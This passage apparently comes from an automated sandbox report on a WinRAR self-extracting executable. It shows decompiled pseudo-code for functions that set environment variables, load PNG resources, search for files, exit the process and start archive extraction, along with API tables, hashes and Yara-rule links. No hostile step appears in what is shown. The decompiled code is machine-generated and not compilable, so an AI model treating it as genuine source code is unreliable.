				SetEnvironmentVariableW(L"sfxname", 0xcfce18);
				GetLocalTime(_t106 + 0xc);
				_push( *(_t106 + 0x1a) & 0x0000ffff);
				_push( *(_t106 + 0x1c) & 0x0000ffff);
				_push( *(_t106 + 0x1e) & 0x0000ffff);
				_push( *(_t106 + 0x20) & 0x0000ffff);
				_push( *(_t106 + 0x22) & 0x0000ffff);
				_push( *(_t106 + 0x22) & 0x0000ffff);
				E00CA3E41(_t106 + 0x9c, 0x32, L"%4d-%02d-%02d-%02d-%02d-%02d-%03d",  *(_t106 + 0x24) & 0x0000ffff);
				_t107 = _t106 + 0x28;
				SetEnvironmentVariableW(L"sfxstime", _t107 + 0x7c);
				_t97 = GetModuleHandleW(_t74);
				 *0xce0064 = _t97;
				 *0xce0060 = _t97; // executed
				_t41 = LoadIconW(_t97, 0x64); // executed
				 *0xceb704 = _t41;
				 *0xcf5d04 = E00CBA4F8(_t89, _t125);
				E00CACFAB(0xce0078, _t89, 0xcfce18);
				E00CB83FC(0);
				E00CB83FC(0);
				 *0xce75e8 = _t107 + 0x5c;
				 *0xce75ec = _t107 + 0x30; // executed
				DialogBoxParamW(_t97, L"STARTDLG", _t74, E00CBA5D1, _t74); // executed
				 *0xce75ec = _t74;
				 *0xce75e8 = _t74;
				E00CB84AE(_t107 + 0x24);
				E00CB84AE(_t107 + 0x50);
				_t51 =  *0xcfde28;
				if(_t51 != 0) {
					Sleep(_t51);
				}
				if( *0xce85f8 != 0) {
					E00CB9CA1(0xcfce18);
				}
				E00CAE797(0xcf5c00);
				if( *0xce75e4 > 0) {
					L00CC2B4E( *0xce75e0);
				}
				DeleteObject( *0xceb704);
				_t54 =  *0xcf5d04;
				if(_t54 != 0) {
					DeleteObject(_t54);
				}
				if( *0xce00e0 == 0 &&  *0xce75d7 != 0) {
					E00CA6E03(0xce00e0, 0xff);
				}
				_t55 =  *0xcfde2c;
				 *0xce75d7 = 1;
				if( *0xcfde2c != 0) {
					E00CBC8F0(_t55);
					CloseHandle( *0xcfde2c);
				}
				_t99 =  *0xce00e0; // 0x0
				if( *0xcfde21 != 0) {
					_t58 =  *0xcdd5fc; // 0x3e8
					if( *0xcfde22 == 0) {
						__eflags = _t58;
						if(_t58 < 0) {
							_t99 = _t99 - _t58;
							__eflags = _t99;
						}
					} else {
						_t99 =  *0xcfde24;
						if(_t58 > 0) {
							_t99 = _t99 + _t58;
						}
					}
				}
				E00CB9B08(_t107 + 0x1c); // executed
				return _t99;
			}




















                0x00cbcbb8
                0x00cbcbb8
                0x00cbcbc3
                0x00cbcbd2
                0x00cbcbdb
                0x00cbcbe5
                0x00cbcbef
                0x00cbcbf8
                0x00cbcbfd
                0x00cbcc06
                0x00cbcc08
                0x00cbcc0a
                0x00cbcc0c
                0x00cbcc0d
                0x00cbcc18
                0x00cbcc85
                0x00cbcc1a
                0x00cbcc2d
                0x00cbcc31
                0x00cbcc72
                0x00cbcc78
                0x00cbcc78
                0x00cbcc7b
                0x00cbcc81
                0x00cbcc18
                0x00cbcc96
                0x00cbcca8
                0x00cbccaf
                0x00cbccba
                0x00cbccc0
                0x00cbccc6
                0x00cbcccc
                0x00cbccd2
                0x00cbccd8
                0x00cbccee
                0x00cbccf3
                0x00cbcd00
                0x00cbcd09
                0x00cbcd0e
                0x00cbcd14
                0x00cbcd1a
                0x00cbcd20
                0x00cbcd30
                0x00cbcd35
                0x00cbcd3e
                0x00cbcd47
                0x00cbcd57
                0x00cbcd66
                0x00cbcd6b
                0x00cbcd75
                0x00cbcd7b
                0x00cbcd81
                0x00cbcd8a
                0x00cbcd8f
                0x00cbcd96
                0x00cbcd99
                0x00cbcd99
                0x00cbcda6
                0x00cbcda8
                0x00cbcda8
                0x00cbcdb2
                0x00cbcdbe
                0x00cbcdc6
                0x00cbcdcb
                0x00cbcdd8
                0x00cbcdda
                0x00cbcde1
                0x00cbcde4
                0x00cbcde4
                0x00cbcded
                0x00cbce02
                0x00cbce02
                0x00cbce07
                0x00cbce0c
                0x00cbce15
                0x00cbce18
                0x00cbce23
                0x00cbce23
                0x00cbce30
                0x00cbce36
                0x00cbce3f
                0x00cbce44
                0x00cbce54
                0x00cbce56
                0x00cbce58
                0x00cbce58
                0x00cbce58
                0x00cbce46
                0x00cbce46
                0x00cbce4e
                0x00cbce50
                0x00cbce50
                0x00cbce4e
                0x00cbce44
                0x00cbce5e
                0x00cbce6e

                APIs
                  • Part of subcall function 00CAFD49: GetModuleHandleW.KERNEL32 ref: 00CAFD61
                  • Part of subcall function 00CAFD49: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00CAFD79
                  • Part of subcall function 00CAFD49: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CAFD9C
                  • Part of subcall function 00CB95F8: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00CB9600
                  • Part of subcall function 00CB9AA0: OleInitialize.OLE32(00000000), ref: 00CB9AB9
                  • Part of subcall function 00CB9AA0: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00CB9AF0
                  • Part of subcall function 00CB9AA0: SHGetMalloc.SHELL32(00CE75C0), ref: 00CB9AFA
                  • Part of subcall function 00CB1017: GetCPInfo.KERNEL32(00000000,?), ref: 00CB1028
                  • Part of subcall function 00CB1017: IsDBCSLeadByte.KERNEL32(00000000), ref: 00CB103C
                • GetCommandLineW.KERNEL32 ref: 00CBCC00
                • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00CBCC27
                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00CBCC38
                • UnmapViewOfFile.KERNEL32(00000000), ref: 00CBCC72
                  • Part of subcall function 00CBC891: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00CBC8A7
                  • Part of subcall function 00CBC891: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00CBC8E3
                • CloseHandle.KERNEL32(00000000), ref: 00CBCC7B
                • GetModuleFileNameW.KERNEL32(00000000,00CFCE18,00000800), ref: 00CBCC96
                • SetEnvironmentVariableW.KERNEL32(sfxname,00CFCE18), ref: 00CBCCA8
                • GetLocalTime.KERNEL32(?), ref: 00CBCCAF
                • _swprintf.LIBCMT ref: 00CBCCEE
                • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00CBCD00
                • GetModuleHandleW.KERNEL32(00000000), ref: 00CBCD03
                • LoadIconW.USER32(00000000,00000064), ref: 00CBCD1A
                • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001A5D1,00000000), ref: 00CBCD6B
                • Sleep.KERNEL32(?), ref: 00CBCD99
                • DeleteObject.GDI32 ref: 00CBCDD8
                • DeleteObject.GDI32(?), ref: 00CBCDE4
                • CloseHandle.KERNEL32 ref: 00CBCE23
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                • API String ID: 788466649-586660713
                • Opcode ID: 55cf8d644b5c9bde859b691c9c0d032863525dce9d5696a107db647260a74169
                • Instruction ID: a32f0b66bd82add5f187da57cafd42cc2407f713d08a922b69c6060e1975a288
                • Opcode Fuzzy Hash: 55cf8d644b5c9bde859b691c9c0d032863525dce9d5696a107db647260a74169
                • Instruction Fuzzy Hash: 94610971905384ABD710AB71ECC9FBF3BECEB58700F04042AF646961A1DBB49D44DBA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CB963A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 92memorywindowCOMMON
                Download Yara Rule
                C-Code - Quality: 67%
                			E00CB963A(WCHAR* _a4) {
				WCHAR* _v4;
				intOrPtr _v8;
				intOrPtr* _v16;
				char _v20;
				void* __ecx;
				struct HRSRC__* _t14;
				WCHAR* _t16;
				void* _t17;
				void* _t18;
				void* _t19;
				intOrPtr* _t26;
				char* _t30;
				long _t32;
				void* _t34;
				intOrPtr* _t35;
				void* _t40;
				struct HRSRC__* _t42;
				intOrPtr* _t44;

				_t14 = FindResourceW( *0xce0060, _a4, "PNG");
				_t42 = _t14;
				if(_t42 == 0) {
					return _t14;
				}
				_t32 = SizeofResource( *0xce0060, _t42);
				if(_t32 == 0) {
					L4:
					_t16 = 0;
					L16:
					return _t16;
				}
				_t17 = LoadResource( *0xce0060, _t42);
				if(_t17 == 0) {
					goto L4;
				}
				_t18 = LockResource(_t17);
				_t43 = _t18;
				if(_t18 != 0) {
					_v4 = 0;
					_t19 = GlobalAlloc(2, _t32); // executed
					_t40 = _t19;
					if(_t40 == 0) {
						L15:
						_t16 = _v4;
						goto L16;
					}
					if(GlobalLock(_t40) == 0) {
						L14:
						GlobalFree(_t40);
						goto L15;
					}
					E00CBEA80(_t20, _t43, _t32);
					_a4 = 0;
					_push( &_a4);
					_push(0);
					_push(_t40);
					if( *0xcddff8() == 0) {
						_t26 = E00CB95CF(_t24, _t34, _v8, 0); // executed
						_t35 = _v16;
						_t44 = _t26;
						 *((intOrPtr*)( *_t35 + 8))(_t35);
						if(_t44 != 0) {
							 *((intOrPtr*)(_t44 + 8)) = 0;
							if( *((intOrPtr*)(_t44 + 8)) == 0) {
								_push(0xffffff);
								_t30 =  &_v20;
								_push(_t30);
								_push( *((intOrPtr*)(_t44 + 4)));
								L00CBD81A(); // executed
								if(_t30 != 0) {
									 *((intOrPtr*)(_t44 + 8)) = _t30;
								}
							}
							 *((intOrPtr*)( *_t44))(1);
						}
					}
					GlobalUnlock(_t40);
					goto L14;
				}
				goto L4;
			}





















                0x00cb964b
                0x00cb9651
                0x00cb9655
                0x00cb9732
                0x00cb9732
                0x00cb9669
                0x00cb966d
                0x00cb968d
                0x00cb968d
                0x00cb972f
                0x00000000
                0x00cb972f
                0x00cb9676
                0x00cb967e
                0x00000000
                0x00000000
                0x00cb9681
                0x00cb9687
                0x00cb968b
                0x00cb969b
                0x00cb969f
                0x00cb96a5
                0x00cb96a9
                0x00cb9729
                0x00cb9729
                0x00000000
                0x00cb972e
                0x00cb96b4
                0x00cb9722
                0x00cb9723
                0x00000000
                0x00cb9723
                0x00cb96b9
                0x00cb96c1
                0x00cb96c9
                0x00cb96ca
                0x00cb96cb
                0x00cb96d4
                0x00cb96db
                0x00cb96e0
                0x00cb96e4
                0x00cb96e9
                0x00cb96ee
                0x00cb96f3
                0x00cb96f8
                0x00cb96fa
                0x00cb96ff
                0x00cb9703
                0x00cb9704
                0x00cb9707
                0x00cb970e
                0x00cb9710
                0x00cb9710
                0x00cb970e
                0x00cb9719
                0x00cb9719
                0x00cb96ee
                0x00cb971c
                0x00000000
                0x00cb971c
                0x00000000

                APIs
                • FindResourceW.KERNEL32(00000066,PNG,?,?,00CBA54A,00000066), ref: 00CB964B
                • SizeofResource.KERNEL32(00000000,76B95B70,?,?,00CBA54A,00000066), ref: 00CB9663
                • LoadResource.KERNEL32(00000000,?,?,00CBA54A,00000066), ref: 00CB9676
                • LockResource.KERNEL32(00000000,?,?,00CBA54A,00000066), ref: 00CB9681
                • GlobalAlloc.KERNELBASE(00000002,00000000,00000000,?,?,?,00CBA54A,00000066), ref: 00CB969F
                • GlobalLock.KERNEL32 ref: 00CB96AC
                • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00CB9707
                • GlobalUnlock.KERNEL32(00000000), ref: 00CB971C
                • GlobalFree.KERNEL32 ref: 00CB9723
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
                • String ID: PNG
                • API String ID: 4097654274-364855578
                • Opcode ID: 46387f7dc9480fe5ff7cc4cd92092d764c23226c4ab3a8978a8022a8cbd45659
                • Instruction ID: 0c8a6842551f63b359ea48945bd48308910365d682b4907b6df89ec20dba7dd0
                • Opcode Fuzzy Hash: 46387f7dc9480fe5ff7cc4cd92092d764c23226c4ab3a8978a8022a8cbd45659
                • Instruction Fuzzy Hash: E721BF71611212ABC3219F61DC88F6FBBF8EF59791F104529FA52D2260DB31CD00DAA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CAA2DF, Relevance: 7.6, APIs: 5, Instructions: 108fileCOMMON
                Download Yara Rule
                C-Code - Quality: 80%
                			E00CAA2DF(void* __edx, intOrPtr _a4, intOrPtr _a8, char _a32, short _a592, void* _a4692, WCHAR* _a4696, intOrPtr _a4700) {
				struct _WIN32_FIND_DATAW _v0;
				char _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				signed int _t43;
				signed int _t49;
				signed int _t63;
				void* _t65;
				long _t68;
				char _t69;
				void* _t73;
				void* _t82;
				intOrPtr _t84;
				void* _t87;
				signed int _t89;
				void* _t90;

				_t82 = __edx;
				E00CBD940();
				_push(_t89);
				_t87 = _a4692;
				_t84 = _a4700;
				_t90 = _t89 | 0xffffffff;
				_push( &_v0);
				if(_t87 != _t90) {
					_t43 = FindNextFileW(_t87, ??);
					__eflags = _t43;
					if(_t43 == 0) {
						_t87 = _t90;
						_t63 = GetLastError();
						__eflags = _t63 - 0x12;
						_t11 = _t63 != 0x12;
						__eflags = _t11;
						 *((char*)(_t84 + 0x1044)) = _t63 & 0xffffff00 | _t11;
					}
					__eflags = _t87 - _t90;
					if(_t87 != _t90) {
						goto L13;
					}
				} else {
					_t65 = FindFirstFileW(_a4696, ??); // executed
					_t87 = _t65;
					if(_t87 != _t90) {
						L13:
						E00CAFAB1(_t84, _a4696, 0x800);
						_push(0x800);
						E00CAB9B9(__eflags, _t84,  &_a32);
						_t49 = 0 + _a8;
						__eflags = _t49;
						 *(_t84 + 0x1000) = _t49;
						asm("adc ecx, 0x0");
						 *((intOrPtr*)(_t84 + 0x1008)) = _v24;
						 *((intOrPtr*)(_t84 + 0x1028)) = _v20;
						 *((intOrPtr*)(_t84 + 0x102c)) = _v16;
						 *((intOrPtr*)(_t84 + 0x1030)) = _v12;
						 *((intOrPtr*)(_t84 + 0x1034)) = _v8;
						 *((intOrPtr*)(_t84 + 0x1038)) = _v4;
						 *(_t84 + 0x103c) = _v0.dwFileAttributes;
						 *((intOrPtr*)(_t84 + 0x1004)) = _a4;
						E00CB0A81(_t84 + 0x1010, _t82,  &_v4);
						E00CB0A81(_t84 + 0x1018, _t82,  &_v24);
						E00CB0A81(_t84 + 0x1020, _t82,  &_v20);
					} else {
						if(E00CAB32C(_a4696,  &_a592, 0x800) == 0) {
							L4:
							_t68 = GetLastError();
							if(_t68 == 2 || _t68 == 3 || _t68 == 0x12) {
								_t69 = 0;
								__eflags = 0;
							} else {
								_t69 = 1;
							}
							 *((char*)(_t84 + 0x1044)) = _t69;
						} else {
							_t73 = FindFirstFileW( &_a592,  &_v0); // executed
							_t87 = _t73;
							if(_t87 != _t90) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
				}
				 *(_t84 + 0x1040) =  *(_t84 + 0x1040) & 0x00000000;
				return _t87;
			}






















                0x00caa2df
                0x00caa2e4
                0x00caa2ea
                0x00caa2ec
                0x00caa2f8
                0x00caa2ff
                0x00caa302
                0x00caa305
                0x00caa37a
                0x00caa380
                0x00caa382
                0x00caa384
                0x00caa386
                0x00caa38c
                0x00caa38f
                0x00caa38f
                0x00caa392
                0x00caa392
                0x00caa398
                0x00caa39a
                0x00000000
                0x00000000
                0x00caa307
                0x00caa314
                0x00caa316
                0x00caa31a
                0x00caa3a0
                0x00caa3ae
                0x00caa3b3
                0x00caa3ba
                0x00caa3c5
                0x00caa3c5
                0x00caa3c9
                0x00caa3d3
                0x00caa3d6
                0x00caa3e0
                0x00caa3ea
                0x00caa3f4
                0x00caa3fe
                0x00caa408
                0x00caa412
                0x00caa41c
                0x00caa429
                0x00caa439
                0x00caa449
                0x00caa320
                0x00caa33b
                0x00caa352
                0x00caa352
                0x00caa35b
                0x00caa36c
                0x00caa36c
                0x00caa367
                0x00caa369
                0x00caa369
                0x00caa36e
                0x00caa33d
                0x00caa34a
                0x00caa34c
                0x00caa350
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00caa350
                0x00caa33b
                0x00caa31a
                0x00caa44e
                0x00caa461

                APIs
                • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00CAA1DA,000000FF,?,?), ref: 00CAA314
                • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00CAA1DA,000000FF,?,?), ref: 00CAA34A
                • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00CAA1DA,000000FF,?,?), ref: 00CAA352
                • FindNextFileW.KERNEL32(?,?,?,?,?,?,00CAA1DA,000000FF,?,?), ref: 00CAA37A
                • GetLastError.KERNEL32(?,?,?,?,00CAA1DA,000000FF,?,?), ref: 00CAA386
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: FileFind$ErrorFirstLast$Next
                • String ID:
                • API String ID: 869497890-0
                • Opcode ID: 7160569bbef9fffb1adc55f074abbfe6e0a1ffc5ecd418f09d785cbaa46acdd6
                • Instruction ID: cbd4e974bd0d79198e9d910562dcecf0db5cb646c77feab762dd2d1aec6f5f99
                • Opcode Fuzzy Hash: 7160569bbef9fffb1adc55f074abbfe6e0a1ffc5ecd418f09d785cbaa46acdd6
                • Instruction Fuzzy Hash: 77418F72605346AFC724EF64C880ADBF7E8BB49354F004A2AF5A9D3250D770E954DB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CC6AF3, Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00CC6AF3(int _a4) {
				void* _t14;
				void* _t16;

				if(E00CC9D6E(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00CC6B78(_t14, _t16, _a4);
				ExitProcess(_a4);
			}





                0x00cc6aff
                0x00cc6b1b
                0x00cc6b1b
                0x00cc6b24
                0x00cc6b2d

                APIs
                • GetCurrentProcess.KERNEL32(?,?,00CC6AC9,?,00CDA800,0000000C,00CC6C20,?,00000002,00000000), ref: 00CC6B14
                • TerminateProcess.KERNEL32(00000000,?,00CC6AC9,?,00CDA800,0000000C,00CC6C20,?,00000002,00000000), ref: 00CC6B1B
                • ExitProcess.KERNEL32 ref: 00CC6B2D
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Process$CurrentExitTerminate
                • String ID:
                • API String ID: 1703294689-0
                • Opcode ID: 52c6a5ac4a7400dbae52658cb6130d9311f6078193391af60615f1f7176da9c5
                • Instruction ID: 732181b5370c0c8914e303ee03c42fc72659e602cbc2b4e472b4bfaeabfbe2d1
                • Opcode Fuzzy Hash: 52c6a5ac4a7400dbae52658cb6130d9311f6078193391af60615f1f7176da9c5
                • Instruction Fuzzy Hash: 06E0EC31001108AFCF116F64DE19F5C7F69EF54741F004419FA099A131CB35ED52EB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CA83C0, Relevance: 3.9, APIs: 2, Instructions: 940COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 68%
                			E00CA83C0(intOrPtr __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t370;
				signed int _t374;
				signed int _t375;
				signed int _t380;
				signed int _t385;
				void* _t387;
				signed int _t388;
				signed int _t392;
				signed int _t393;
				signed int _t398;
				signed int _t403;
				signed int _t404;
				signed int _t408;
				signed int _t418;
				signed int _t419;
				signed int _t422;
				signed int _t423;
				signed int _t432;
				char _t434;
				char _t436;
				signed int _t437;
				signed int _t438;
				signed int _t460;
				signed int _t469;
				intOrPtr _t472;
				char _t479;
				signed int _t480;
				void* _t491;
				void* _t499;
				void* _t501;
				signed int _t511;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t520;
				signed int _t523;
				signed int _t531;
				signed int _t541;
				signed int _t543;
				signed int _t545;
				signed int _t547;
				signed char _t548;
				signed int _t551;
				void* _t556;
				signed int _t564;
				intOrPtr* _t574;
				intOrPtr _t576;
				signed int _t577;
				signed int _t586;
				intOrPtr _t589;
				signed int _t592;
				signed int _t601;
				signed int _t608;
				signed int _t610;
				signed int _t611;
				signed int _t613;
				signed int _t631;
				signed int _t632;
				void* _t639;
				void* _t640;
				signed int _t656;
				signed int _t667;
				intOrPtr _t668;
				void* _t670;
				signed int _t671;
				signed int _t672;
				signed int _t673;
				signed int _t674;
				signed int _t675;
				signed int _t681;
				intOrPtr _t683;
				signed int _t688;
				intOrPtr _t690;
				signed int _t692;
				signed int _t696;
				void* _t698;
				signed int _t699;
				signed int _t702;
				signed int _t703;
				void* _t706;
				void* _t708;
				void* _t710;

				_t576 = __ecx;
				E00CBD870(E00CD12F2, _t706);
				E00CBD940();
				_t574 =  *((intOrPtr*)(_t706 + 8));
				_t665 = 0;
				_t683 = _t576;
				 *((intOrPtr*)(_t706 - 0x20)) = _t683;
				_t370 =  *( *(_t683 + 8) + 0x82f2) & 0x0000ffff;
				 *(_t706 - 0x18) = _t370;
				if( *(_t706 + 0xc) != 0) {
					L6:
					_t690 =  *((intOrPtr*)(_t574 + 0x21dc));
					__eflags = _t690 - 2;
					if(_t690 == 2) {
						 *(_t683 + 0x10f5) = _t665;
						__eflags =  *(_t574 + 0x32dc) - _t665;
						if(__eflags > 0) {
							L22:
							__eflags =  *(_t574 + 0x32e4) - _t665;
							if(__eflags > 0) {
								L26:
								_t577 =  *(_t683 + 8);
								__eflags =  *((intOrPtr*)(_t577 + 0x615c)) - _t665;
								if( *((intOrPtr*)(_t577 + 0x615c)) != _t665) {
									L29:
									 *(_t706 - 0x11) = _t665;
									_t35 = _t706 - 0x51a8; // -18856
									_t36 = _t706 - 0x11; // 0x7ef
									_t374 = E00CA5C80(_t577, _t574 + 0x2280, _t36, 6, _t665, _t35, 0x800);
									__eflags = _t374;
									_t375 = _t374 & 0xffffff00 | _t374 != 0x00000000;
									 *(_t706 - 0x10) = _t375;
									__eflags = _t375;
									if(_t375 != 0) {
										__eflags =  *(_t706 - 0x11);
										if( *(_t706 - 0x11) == 0) {
											__eflags = 0;
											 *((char*)(_t683 + 0xf1)) = 0;
										}
									}
									E00CA1F1B(_t574);
									_push(0x800);
									_t43 = _t706 - 0x113c; // -2364
									_push(_t574 + 0x22a8);
									E00CAAFA3();
									__eflags =  *((char*)(_t574 + 0x3373));
									 *(_t706 - 0x1c) = 1;
									if( *((char*)(_t574 + 0x3373)) == 0) {
										_t380 = E00CA2005(_t574);
										__eflags = _t380;
										if(_t380 == 0) {
											_t548 =  *(_t683 + 8);
											__eflags = 1 -  *((intOrPtr*)(_t548 + 0x72bc));
											asm("sbb al, al");
											_t61 = _t706 - 0x10;
											 *_t61 =  *(_t706 - 0x10) &  !_t548;
											__eflags =  *_t61;
										}
									} else {
										_t551 =  *( *(_t683 + 8) + 0x72bc);
										__eflags = _t551 - 1;
										if(_t551 != 1) {
											__eflags =  *(_t706 - 0x11);
											if( *(_t706 - 0x11) == 0) {
												__eflags = _t551;
												 *(_t706 - 0x10) =  *(_t706 - 0x10) & (_t551 & 0xffffff00 | _t551 == 0x00000000) - 0x00000001;
												_push(0);
												_t54 = _t706 - 0x113c; // -2364
												_t556 = E00CAB8F2(_t54);
												_t656 =  *(_t683 + 8);
												__eflags =  *((intOrPtr*)(_t656 + 0x72bc)) - 1 - _t556;
												if( *((intOrPtr*)(_t656 + 0x72bc)) - 1 != _t556) {
													 *(_t706 - 0x10) = 0;
												} else {
													_t57 = _t706 - 0x113c; // -2364
													_push(1);
													E00CAB8F2(_t57);
												}
											}
										}
									}
									 *((char*)(_t683 + 0x5f)) =  *((intOrPtr*)(_t574 + 0x3319));
									 *((char*)(_t683 + 0x60)) = 0;
									asm("sbb eax, [ebx+0x32dc]");
									 *((intOrPtr*)( *_t574 + 0x10))( *((intOrPtr*)(_t574 + 0x6ca8)) -  *(_t574 + 0x32d8),  *((intOrPtr*)(_t574 + 0x6cac)), 0);
									_t667 = 0;
									_t385 = 0;
									 *(_t706 + 0xb) = 0;
									 *(_t706 + 0xc) = 0;
									__eflags =  *(_t706 - 0x10);
									if( *(_t706 - 0x10) != 0) {
										L43:
										_t692 =  *(_t706 - 0x18);
										_t586 =  *((intOrPtr*)( *(_t683 + 8) + 0x61f9));
										_t387 = 0x49;
										__eflags = _t586;
										if(_t586 == 0) {
											L45:
											_t388 = _t667;
											L46:
											__eflags = _t586;
											_t82 = _t706 - 0x113c; // -2364
											_t392 = E00CB0FD9(_t586, _t82, (_t388 & 0xffffff00 | _t586 == 0x00000000) & 0x000000ff, _t388,  *(_t706 + 0xc)); // executed
											__eflags = _t392;
											if(__eflags == 0) {
												L219:
												_t393 = 0;
												L16:
												L17:
												 *[fs:0x0] =  *((intOrPtr*)(_t706 - 0xc));
												return _t393;
											}
											 *((intOrPtr*)(_t706 - 0x38)) = _t683 + 0x10f6;
											_t85 = _t706 - 0x113c; // -2364
											E00CA80B1(_t683, __eflags, _t574, _t85, _t683 + 0x10f6, 0x800);
											__eflags =  *(_t706 + 0xb);
											if( *(_t706 + 0xb) != 0) {
												L50:
												 *(_t706 + 0xf) = 0;
												L51:
												_t398 =  *(_t683 + 8);
												_t589 = 0x45;
												__eflags =  *((char*)(_t398 + 0x6153));
												_t668 = 0x58;
												 *((intOrPtr*)(_t706 - 0x34)) = _t589;
												 *((intOrPtr*)(_t706 - 0x30)) = _t668;
												if( *((char*)(_t398 + 0x6153)) != 0) {
													L53:
													__eflags = _t692 - _t589;
													if(_t692 == _t589) {
														L55:
														_t96 = _t706 - 0x31a8; // -10664
														E00CA6EF9(_t96);
														_push(0);
														_t97 = _t706 - 0x31a8; // -10664
														_t403 = E00CAA1B1(_t96, _t668, __eflags, _t683 + 0x10f6, _t97);
														__eflags = _t403;
														if(_t403 == 0) {
															_t404 =  *(_t683 + 8);
															__eflags =  *((char*)(_t404 + 0x6153));
															_t108 = _t706 + 0xf;
															 *_t108 =  *(_t706 + 0xf) & (_t404 & 0xffffff00 |  *((char*)(_t404 + 0x6153)) != 0x00000000) - 0x00000001;
															__eflags =  *_t108;
															L61:
															_t110 = _t706 - 0x113c; // -2364
															_t408 = E00CA7BE2(_t110, _t574, _t110);
															__eflags = _t408;
															if(_t408 != 0) {
																while(1) {
																	__eflags =  *((char*)(_t574 + 0x331b));
																	if( *((char*)(_t574 + 0x331b)) == 0) {
																		goto L65;
																	}
																	_t115 = _t706 - 0x113c; // -2364
																	_t541 = E00CA807D(_t683, _t574);
																	__eflags = _t541;
																	if(_t541 == 0) {
																		 *((char*)(_t683 + 0x20f6)) = 1;
																		goto L219;
																	}
																	L65:
																	_t117 = _t706 - 0x13c; // 0x6c4
																	_t592 = 0x40;
																	memcpy(_t117,  *(_t683 + 8) + 0x5024, _t592 << 2);
																	_t710 = _t708 + 0xc;
																	asm("movsw");
																	_t120 = _t706 - 0x2c; // 0x7d4
